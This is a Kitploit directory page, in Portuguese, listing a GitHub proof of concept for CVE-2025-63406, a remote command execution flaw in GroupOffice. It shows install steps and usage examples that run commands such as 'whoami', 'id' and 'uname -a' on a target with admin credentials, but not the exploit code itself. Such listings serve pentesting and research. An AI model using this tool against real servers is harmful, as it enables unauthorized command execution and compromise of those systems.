Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-63406-PoC — Pequeno PoC para automatizar a exploração de CVE-2025-63406. | Kitploit
Ferramentas/GitHubGitHub/nxvh1337/cve-2025-63406-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubnxvh1337/cve-2025-63406-poc

CVE-2025-63406-PoC

Pequeno PoC para automatizar a exploração de CVE-2025-63406.

Ver Repositório
4há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-63406 PoC

Instalação

root@kitploit:~
# Instalar dependências
pip install -r requirements.txt

# Ou usar um ambiente virtual
python3 -m venv venv
source venv/bin/activate  # No Windows: venv\Scripts\activate
pip install -r requirements.txt

Uso

root@kitploit:~
python3 CVE-2025-63406.py -u <URL> -n <USUÁRIO> -p <SENHA> -c <COMANDO>

Argumentos

  • -u, --url: URL base da instância do GroupOffice (ex.: http://localhost:9090)
  • -n, --username: Nome de usuário para autenticação
  • -p, --password: Senha para autenticação
  • -c, --command: Comando do sistema a ser executado (ex.: whoami, id, ls -la)

Exemplos

root@kitploit:~
# Executar comando whoami
python3 CVE-2025-63406.py -u http://localhost:9090 -n admin -p password -c whoami

# Executar comando id
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c id

# Listar arquivos no diretório atual
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "ls -la"

# Obter informações do sistema
python3 CVE-2025-63406.py -u http://target.com:9090 -n admin -p password -c "uname -a"

PoC em uso com comando id PoC em uso com comando "uname -a"

Aviso Legal

⚠️ Esta ferramenta é apenas para testes autorizados. Acesso não autorizado a sistemas de computador é ilegal.

Baixar ferramenta